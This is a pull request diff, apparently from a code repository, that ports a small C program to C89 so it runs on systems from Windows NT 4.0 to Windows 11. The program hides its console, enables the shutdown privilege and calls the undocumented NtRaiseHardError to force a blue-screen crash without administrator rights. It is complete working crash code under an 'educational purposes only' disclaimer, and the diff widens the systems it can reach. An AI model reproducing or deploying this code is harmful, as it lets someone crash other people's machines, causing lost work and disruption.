### PR TITLE
Conversion to C89 code + Windows NT 4.0 support

### DIFF
--- a/NtRaiseHardError.c
+++ b/NtRaiseHardError.c
@@ -1,71 +1,94 @@
 #include <stdio.h>
 #include <time.h>
 #include <Windows.h>
-#include <winternl.h>
-#include <ntstatus.h>
+
+#define NT_SUCCESS(Status)  (((NTSTATUS)(Status)) >= 0)
+typedef LONG NTSTATUS;
+typedef ULONG* ULONG_PTR;
+typedef ULONG_PTR* PULONG_PTR;
+
+#define STATUS_DLL_INIT_FAILED ((NTSTATUS)0xC0000142L)
+#define STATUS_INVALID_ADDRESS ((NTSTATUS)0xC0000141L)
 
 // Declaration of RtlAdjustPrivilege and NtRaiseHardError
-typedef NTSTATUS(NTAPI* pdef_RtlAdjustPrivilege)(ULONG Privilege, BOOLEAN Enable, BOOLEAN CurrentThread, PBOOLEAN Enabled);
-typedef NTSTATUS(NTAPI* pdef_NtRaiseHardError)(NTSTATUS ErrorStatus, ULONG NumberOfParameters, ULONG UnicodeStringParameterMask, PULONG_PTR Parameters, ULONG ResponseOption, PULONG Response);
+typedef NTSTATUS(NTAPI* pdef_RtlAdjustPrivilege)(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN);
+typedef NTSTATUS(NTAPI* pdef_NtRaiseHardError)(NTSTATUS, ULONG, ULONG, PULONG_PTR, ULONG, PULONG);
+
+// Declaration of GetConsoleWindow (NT5 or later)
+typedef HWND (WINAPI* pdef_GetConsoleWindow)(void);
 
 int main()
 {
-    // Hide console
-    ShowWindow(GetConsoleWindow(), SW_HIDE);
+	// For error handling
+	NTSTATUS error_ret = NULL;
+	// Load ntdll.dll to current process
+	HMODULE ntdll = LoadLibraryW(L"ntdll.dll");
+	pdef_RtlAdjustPrivilege RtlAdjustPrivilege;
+	pdef_NtRaiseHardError NtRaiseHardError;
 
-    // Set current process priority class to highest available
-    SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
-    
-    // For error handling
-    NTSTATUS error_ret = NULL;
+	// Load kernel32.dll to current process
+	HMODULE kernel32 = LoadLibraryW(L"kernel32.dll");
+	pdef_GetConsoleWindow GetConsoleWindow;
 
-    // Load ntdll.dll to current process
-    HMODULE ntdll = LoadLibraryW(L"ntdll.dll");
-    if (ntdll == NULL)
-    {
-        error_ret = STATUS_DLL_INIT_FAILED;
-        goto jmp_exit;
-    }
+	BOOLEAN bEnabled;
+	NTSTATUS shutdown_priv;
 
-    // Import address of RtlAdjustPrivilege and NtRaiseHardError
-    pdef_RtlAdjustPrivilege RtlAdjustPrivilege = (pdef_RtlAdjustPrivilege)GetProcAddress(ntdll, "RtlAdjustPrivilege");
-    pdef_NtRaiseHardError NtRaiseHardError = (pdef_NtRaiseHardError)GetProcAddress(ntdll, "NtRaiseHardError");
-    if (RtlAdjustPrivilege == NULL || NtRaiseHardError == NULL)
-    {
-        error_ret = STATUS_INVALID_ADDRESS;
-        goto jmp_exit;
-    }
+	ULONG uResp;
+	NTSTATUS bsod;
 
-    // Activate shutdown privilege
-    BOOLEAN bEnabled;
-    NTSTATUS shutdown_priv = RtlAdjustPrivilege(19, TRUE, FALSE, &bEnabled);
-    if (!NT_SUCCESS(shutdown_priv))
-    {
-        error_ret = shutdown_priv;
-        goto jmp_exit;
-    }
+	// Hide console
+	GetConsoleWindow = (pdef_GetConsoleWindow)GetProcAddress(kernel32, "GetConsoleWindow");
+	if(GetConsoleWindow != NULL) {
+		ShowWindow(GetConsoleWindow(), SW_HIDE);
+	}
+	// Set current process priority class to highest available
+	SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
+	
 
-    // Push bsod
-    srand((UINT32)time(NULL));
-    ULONG uResp;
-    NTSTATUS bsod = NtRaiseHardError((NTSTATUS)(0xC0000000 | ((rand() % 10) << 8) | ((rand() % 16) << 4) | rand() % 16), NULL, NULL, NULL, 6, &uResp);
-    if (!NT_SUCCESS(bsod))
-    {
-        error_ret = bsod;
-        goto jmp_exit;
-    }
+	if (ntdll == NULL)
+	{
+		error_ret = STATUS_DLL_INIT_FAILED;
+		goto jmp_exit;
+	}
 
-    // Cleanup
-    jmp_exit:
-    if (error_ret != STATUS_DLL_INIT_FAILED || ntdll != NULL)
-    {
-        FreeLibrary(ntdll);
-    }
-    if (error_ret != NULL)
-    {
-        WCHAR msg[] = L"0x%08lX";
-        swprintf(msg, _scwprintf(msg, error_ret) + 1, msg, error_ret);
-        MessageBoxW(NULL, msg, L"Returned", MB_OK | MB_ICONEXCLAMATION | MB_SYSTEMMODAL);
-    }
-    return (int)error_ret;
+	// Import address of RtlAdjustPrivilege and NtRaiseHardError
+	RtlAdjustPrivilege = (pdef_RtlAdjustPrivilege)GetProcAddress(ntdll, "RtlAdjustPrivilege");
+	NtRaiseHardError = (pdef_NtRaiseHardError)GetProcAddress(ntdll, "NtRaiseHardError");
+	if (RtlAdjustPrivilege == NULL || NtRaiseHardError == NULL)
+	{
+		error_ret = STATUS_INVALID_ADDRESS;
+		goto jmp_exit;
+	}
+
+	// Activate shutdown privilege
+	shutdown_priv = RtlAdjustPrivilege(19, TRUE, FALSE, &bEnabled);
+	if (!NT_SUCCESS(shutdown_priv))
+	{
+		error_ret = shutdown_priv;
+		goto jmp_exit;
+	}
+
+	// Push bsod
+	srand((UINT32)time(NULL));
+   
+	bsod = NtRaiseHardError((NTSTATUS)(0xC0000000 | ((rand() % 10) << 8) | ((rand() % 16) << 4) | rand() % 16), NULL, NULL, NULL, 6, &uResp);
+	if (!NT_SUCCESS(bsod))
+	{
+		error_ret = bsod;
+		goto jmp_exit;
+	}
+
+	// Cleanup
+	jmp_exit:
+	if (error_ret != STATUS_DLL_INIT_FAILED || ntdll != NULL)
+	{
+		FreeLibrary(ntdll);
+	}
+	if (error_ret != NULL)
+	{
+		WCHAR msg[17] = L"";
+		swprintf(msg, 16, L"0x%08lX", error_ret);
+		MessageBoxW(NULL, msg, L"Returned", MB_OK | MB_ICONEXCLAMATION | MB_SYSTEMMODAL);
+	}
+	return (int)error_ret;
 }

--- a/NtRaiseHardError.cpp
+++ b/NtRaiseHardError.cpp
@@ -1,1 +1,0 @@
-// empty, use NtRaiseHardError.c

--- a/README.md
+++ b/README.md
@@ -1,16 +1,7 @@
 # NtRaiseHardError
 **FOR EDUCATIONAL PURPOSES ONLY, USE WITH CARE!, WE ARE NOT RESPONSIBLE FOR ANY DAMAGES TO YOUR MACHINE!** <br>
-Simple code snippet about ways to trigger BSOD without administrator privilege with undocumented functions from ntdll.dll. <br>
-Compatible from Windows XP to 11. <br>
-
-```
-# FINAL UPDATE #
-Nov 4 2024
-1. Switch the language from C++ to C
-2. Fix the previously messy codes
-3. More proper error handling
-4. Process priority set to highest available
-```
+Simple code snippet about ways to trigger BSOD without administrator privilege with undocumented NtRaiseHardError function from ntdll.dll. <br>
+Compatible from Windows NT 4.0 to Windows 11. <br>
 
 # Compilers
-Visual Studio or gcc, link to ntdll.dll is not required since it is load ntdll.dll to process. <br>
+Visual C++ 6.0 or later is supported. Any MinGW should also work.<br>


### PR DESCRIPTION
Code is converted to C89 code to increase compatibility with older compilers, at least as back as Visual C++ 6.0.

Also made GetConsoleHandle address to be retrieved on runtime to make the code compatible with Windows NT 4.0.